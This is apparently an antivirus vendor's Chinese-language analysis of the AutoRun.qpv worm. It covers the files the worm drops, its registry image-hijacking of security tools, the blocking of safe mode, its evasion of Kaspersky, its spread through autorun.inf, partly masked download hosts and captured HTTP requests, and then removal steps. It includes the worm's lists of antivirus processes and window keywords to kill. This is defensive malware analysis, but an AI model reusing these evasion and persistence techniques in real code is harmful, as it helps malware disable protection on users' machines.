Worm.Win32.AutoRun.qpv

病毒标籤

病毒名称： Worm.Win32.AutoRun.qpv病毒类型： 蠕虫档案 MD5： 3166743046C030B5E597E5FAE755C33F公开範围： 完全公开危害等级： 4档案长度： 20,560 位元组感染系统： Windows98以上版本开发工具： Microsoft Visual C++ 6.0

病毒描述

病毒遍历进程列表，搜寻并结束对其自身存在构成威胁的进程，隐藏打开Internet Explorer，通过远程写入在IE进程中创建病毒执行绪。病毒修改注册表启动项，达到开机自启动的目的、添加映像劫持项，使众多安全工具无法启动。病毒在各磁碟分区创建autorun.inf档案和病毒副本档案way.pif档案，达到自启动和随身碟传播的目的。病毒检测当前滑鼠位置的视窗是否含有对病毒有危险的信息，当出现病毒认为威胁它存在的信息是关闭此视窗。病毒连线网路更新自身，下载并运行大量其他病毒。

行为分析

本地行为1、档案运行后生成以下档案病毒替换的档案：%System32%dllcachewuauclt.exe 20,560 位元组%System32%wuauclt.exe 20,560 位元组病毒衍生的档案：%System32%dmdskmgrs.dll 594,432 位元组%DriveLetter%WAY.PIF 20,560 位元组%DriveLetter%AUTORUN.INF 147 位元组%HomeDrive%WAY.PIF 20,560 位元组%HomeDrive%AUTORUN.INF 147 位元组系统原档案备份：%DriveLetter%tEM.tep 108,032 位元组2、修改注册表添加注册表项目：[HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options]项：360rpt.EXE值：c:windowssystem32dllcachewuauclt.exe描述：映像劫持。[HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options]项：360safe.EXE值：c:windowssystem32dllcachewuauclt.exe描述：映像劫持。注：被映像劫持的程式有"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe"，在此不赘述。[HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorerRun]项：internetnet值：c:windowssystem32wuauclt.exe描述：自启动项删除注册表项目：[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"描述：禁止进入安全模式，进入安全模式蓝屏。3、破坏系统正常的SFC功能，更改系统档案操作许可权。病毒通过载入系统动态程式库sfc_os.dll，调用当中的函式，利用这些函式修改系统的档案合法性检测，使其在用病毒档案替换系统档案时windows不会提示系统档案被更改。病毒通过通过cacls.exe命令更改以下档案访问控制权："c:windowssystem32packet.dll""c:windowssystem32pthreadVC.dll""c:windowssystem32wpcap.dll""c:windowssystem32driversnpf.sys""c:windowssystem32npptools.dll ""c:windowssystem32driversacpidisk.sys""c:windowssystem32wanpacket.dll"更改为对所有用户为完全控制。注：SFC（系统档案检查器，这个工具在WIN3.X时代开始集成于微软作业系统，并正式出现在Windows 98下，它可以扫描所有受保护的系统档案验证系统档案完整性并用正确的Microsoft程式版本替换不正确的版本）4、病毒企图躲避卡巴斯基的主动防御功能病毒用更改系统时间和替换系统驱动躲避卡巴斯基的主动防御。病毒通过载入其释放的驱动程式beep.sys（替换系统中原有的档案）来重置系统的ssdt来关闭卡巴的主动防御。5、遍历进程列表结束进程病毒遍历系统进程列表当发现以下进程是结束该进程。"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、
"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe"这些其中包含各大防毒软体的进程和系统自动更新进程。6、在各盘符创建autorun.inf档案和病毒副本病毒在各磁碟分区下创建autorun.inf档案和病毒副本档案，将autorun.inf中的打开命令和资源管理器命令指向为该磁碟分区的病毒副本档案。从而使用户打开磁碟分区时附带运行该病毒档案。还可以达到随身碟传播的目的。7、获得视窗句柄结束视窗病毒利用api函式获取当前滑鼠所在位置，获得该位置视窗句柄。若发现该视窗题栏文本中含有以下字元串，关闭该视窗。"卫士"、"杀"、"NOD32"、"process"、"BD"、"瑞星"、"木马"、"绿鹰"、"点"、"Mcafee"、"检"、"Firewall"、"Virus"、"antiy"、"民"、"worm"、"SREng"、"清理"。8、病毒循环检测病毒通过一个死循环不断的执行5，6两个步骤。当发现病毒档案被删除时就会重新创建该档案。网路行为1、 病毒连线网路地址：x.c***update.heis****update.cpus****CSC3-2004-crl.veri****crl.verisign2、 下载并运行大量其他病毒。2[1].exe not-a-virus:AdWare.Win32.Cinmus.vmz9[1].exe Trojan-GameThief.Win32.OnLineGames.tptg1[1].exe Trojan-Downloader.Win32.Zlob.abgq6[1].exe Trojan.Win32.Pakes.ljfx[1].gif Worm.Win32.AutoRun.rjz5[1].exe Trojan-Downloader.Win32.Agent.aksmxx[1].exe 原病毒程式更新档案3[1].exe Trojan-Downloader.Win32.Delf.epw10[1].exe 网站排名工具条（广告件）3、下载的病毒运行时的衍生档案%System32%driversnpf.sys%System32%dllcachewuauclt.exe
%System32%dllcachenpptools.dll%System32%OLDE.tmp%System32%dmdskmgrs.dll%System32%htxvimes.dll%System32%lsaes.exe%System32%WanPacket.dll%System32%Packet.dll%System32%wpcap.dll%System32%wacclt.exe%System32%wuauclt.exe%System32%npptools.dll%System32%mprmsgse.axz%System32%dkmdskmgrs.dll%Windir%Klerpbhealth.dll%Windir%LastGoodsystem32npptools.dll%HomeDrive%Documents and SettingsAll Users「开始」选单程式启动3.pif桌面A.PIF%HomeDrive%Documents and Settings2.pif%HomeDrive%Documents and Settings3.pif%HomeDrive%Documents and Settings6.pif%HomeDrive%Documents and Settings9.pif%HomeDrive%Documents and Settings10.pif%ProgramFiles%Common FilesPushWareUninst.exe%ProgramFiles%Common FilesPushWarecpush.dll%ProgramFiles%eff.pif%ProgramFiles%zzToolBarIP.dat%ProgramFiles%zzToolBarSearchEngineConfig%ProgramFiles%zzToolBarUninstall.exe%ProgramFiles%zzToolBaruISGRLFile.dat%ProgramFiles%zzToolBarToolBand.dll%ProgramFiles%zzToolBarToolbar_bho.dll%HomeDrive%tEM.tep注：由于此档案为病毒更新程式产生，此时system32目录下的wuauclt.exe已经是病毒，所以这个备份也是病毒。
%HomeDrive%h.pif%HomeDrive%tttmm.tep%HomeDrive%HVVP.PIF4、 病毒更新所发数据包a．GET /adsys/rankstat.htm?Install_stat&AgentID=-33554375&Uid=00000000000000000001$$00-0C-29-9D-6E-C3&Auth=D97A0C6F8EA1ED38 HTTP/1.1User-Agent: ProxyDownHost: update.heishatuCache-Control: no-cacheHTTP/1.0 200 OKContent-Length: 21Content-Type: text/htmlLast-Modified: Wed, 23 May 2007 03:37:12 GMTAccept-Ranges: bytesETag: "a24084a6eb9cc71:711"X-Powered-By: ASP.NETServer: Microsoft-IIS/4.0Date: Tue, 28 Oct 2008 02:12:33 GMTX-Cache: MISS from localhostConnection: closeokb．GET /cpush/version.txt HTTP/1.1User-Agent: CPUSH_UPDATERHost: update.cpushpopCache-Control: no-cacheHTTP/1.0 200 OKDate: Tue, 28 Oct 2008 02:12:33 GMTServer: Apache/2.2.2 (Fedora)Last-Modified: Tue, 21 Oct 2008 12:02:22 GMTETag: "f100b7-6d-34404f80"Accept-Ranges: bytesContent-Length: 109Content-Type: text/plain; charset=UTF-8X-Cache: MISS from localhostConnection: close[common]version=1,1,0,9url=http://update.cpus****/cpush/cpush.dllmd5=7e3d08311b3c954197b4f05f044491c0c．GET /cpush/version.txt?version=1,1,0,9&uid=5EAF7213-7BE1-48D2-8C99-0020F68BF3FC HTTP/1.1
User-Agent: CPUSH_UPDATERHost: update.cpushpopCache-Control: no-cacheHTTP/1.0 200 OKDate: Tue, 28 Oct 2008 02:12:33 GMTServer: Apache/2.2.2 (Fedora)Last-Modified: Tue, 21 Oct 2008 12:02:22 GMTETag: "f100b7-6d-34404f80"Accept-Ranges: bytesContent-Length: 109Content-Type: text/plain; charset=UTF-8X-Cache: MISS from localhostConnection: close[common]version=1,1,0,9url=http://update.cpus****/cpush/cpush.dllmd5=7e3d08311b3c954197b4f05f044491c0病毒简要流程如图：注：%System32%是一个可变路径。病毒通过查询作业系统来决定当前System资料夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。%Temp% = C:Documents and SettingsAAAAALocal SettingsTemp 当前用户TEMP快取变数%Windir% WINDODWS所在目录%DriveLetter% 逻辑驱动器根目录%ProgramFiles% 系统程式默认安装目录%HomeDrive% = C: 当前启动的系统的所在分区%Documents and Settings% 当前用户文档根目录

清除方案

1、使用安天防线可彻底清除此病毒(推荐)。2、手工清除请按照行为分析删除对应档案，恢复相关係统设定。(1) 用Atool结束所有IE进程。(2) 用Atool强制删除以下所有档案：病毒原档案%System32%dllcachewuauclt.exe%System32%wuauclt.exe%System32%dmdskmgrs.dll%DriveLetter%WAY.PIF%DriveLetter%AUTORUN.INF%HomeDrive%WAY.PIF %HomeDrive%AUTORUN.INF
%HomeDrive%tEM.tep%System32%driversnpf.sys%System32%dllcachewuauclt.exe%System32%dllcachenpptools.dll%System32%OLDE.tmp%System32%dmdskmgrs.dll%System32%htxvimes.dll%System32%lsaes.exe%System32%WanPacket.dll%System32%Packet.dll%System32%wpcap.dll%System32%wacclt.exe%System32%wuauclt.exe%System32%npptools.dll%System32%mprmsgse.axz%System32%dkmdskmgrs.dll%Windir%Klerpbhealth.dll%Windir%LastGoodsystem32npptools.dll%HomeDrive%Documents and SettingsAll Users「开始」选单程式启动3.pif桌面A.PIF%HomeDrive%Documents and Settings2.pif%HomeDrive%Documents and Settings3.pif%HomeDrive%Documents and Settings6.pif%HomeDrive%Documents and Settings9.pif%HomeDrive%Documents and Settings10.pif%ProgramFiles%Common FilesPushWareUninst.exe%ProgramFiles%Common FilesPushWarecpush.dll%ProgramFiles%eff.pif%ProgramFiles%zzToolBarIP.dat%ProgramFiles%zzToolBarSearchEngineConfig%ProgramFiles%zzToolBarUninstall.exe%ProgramFiles%zzToolBaruISGRLFile.dat%ProgramFiles%zzToolBarToolBand.dll%ProgramFiles%zzToolBarToolbar_bho.dll
%HomeDrive%h.pif%HomeDrive%tttmm.tep%HomeDrive%HVVP.PIF(3) 删除注册表中病毒添加的项a． 将%Windir%regedit.exe更改名称为**.exe。b． 删除注册表下列各项[HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options]主键。[KLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorerRun]项：internetnet值：c:windowssystem32wuauclt.exe[HKLMSoftwareMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects ]项：CAdLogic Object值：c:program filescommon filespushwarecpush0.dll[HKLMSoftwareMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects ]项：Info cache值：c:windowsklerpbhealth.dll[HKLMSoftwareMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects ]项：网站排名工具条BHO网站排名工具条值：c:program fileszztoolbartoolbar_bho.dll[HKLMSoftwareMicrosoftInternet ExplorerToolbar]项：toolband.dll值： c:program fileszztoolbartoolband.dllc． 添加下列注册表项[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootMinimal{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}@]键值: 字元串: "DiskDrive"(4) 恢复原系统档案从乾净的系统中拷贝以下档案：%System32%dllcachewuauclt.exe%System32%wuauclt.exe